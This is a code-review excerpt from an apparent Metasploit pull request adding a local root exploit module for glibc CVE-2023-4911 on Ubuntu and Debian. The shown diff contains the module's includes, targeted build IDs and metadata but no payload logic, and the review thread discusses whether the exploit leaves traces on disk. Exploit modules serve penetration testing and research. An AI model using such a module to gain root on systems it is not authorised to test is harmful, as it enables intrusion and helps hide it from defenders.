modules/exploits/linux/local/glibc_tunables_priv_esc.rb

```diff
@@ -0,0 +1,175 @@
+
+  # includes: is_root?
+  include Msf::Post::Linux::Priv
+  # includes: kernel_release
+  include Msf::Post::Linux::Kernel
+  # include: get_sysinfo
+  include Msf::Post::Linux::System
+  # includes writable?, upload_file, upload_and_chmodx, exploit_data, cd
+  include Msf::Post::File
+  # includes register_files_for_cleanup
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  BUILD_IDS = %w[69c048078b6c51fa8744f3d7cff3b0d9369ffd53 3602eac894717d56555552c84fc6b0e4d6a4af72 a99db3715218b641780b04323e4ae5953d68a927 a8daca28288575ffc8c7641d40901b0148958fb1 61ef896a699bb1c2e4e231642b2e1688b2f1a61e 9a9c6aeba5df4178de168e26fe30ddcdab47d374 e7b1e0ff3d359623538f4ae0ac69b3e8db26b674 956d98a11b839e3392fa1b367b1e3fdfc3e662f6]
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)',
+        'Description' => %q{
+          A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES
+          environment variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when
+          launching binaries with SUID permission to execute code in the context of the root user.
+
+          This module targets glibc packaged on Ubuntu and Debian. The specific glibc versions this module targets are:
+
+          Ubuntu:
+          2.35-0ubuntu3.4 > 2.35
+          2.37-0ubuntu2.1 > 2.37
+          2.38-1ubuntu6 > 2.38
+
+          Debian:
+          2.31-13-deb11u7 > 2.31
+          2.36-9-deb12u3 > 2.36
+
+          Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911
+          however this module does not target them.
+        },
+        'Author' => [
+          'Qualys Threat Research Unit', # discovery
+          'blasty <peter@haxx.in>', # PoC
+          'jheysel-r7' # msf module
+        ],
+        'References' => [
+          ['CVE', '2023-4911'],
+          ['URL', 'https://haxx.in/files/gnu-acme.py'],
+          ['URL', 'https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt'],
+          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2023-4911'],
+          ['URL', 'https://ubuntu.com/security/CVE-2023-4911']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => [ 'linux', 'unix' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PrependSetresgid' => true,
+          'PrependSetresuid' => true,
+          'WfsDelay' => 600
+        },
+        'DisclosureDate' => '2023-10-03',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
```

Comment:
Now that the payload is passed to python directly, there are no traces on disk, are they?

Reply:
I don't think so, I've removed this now.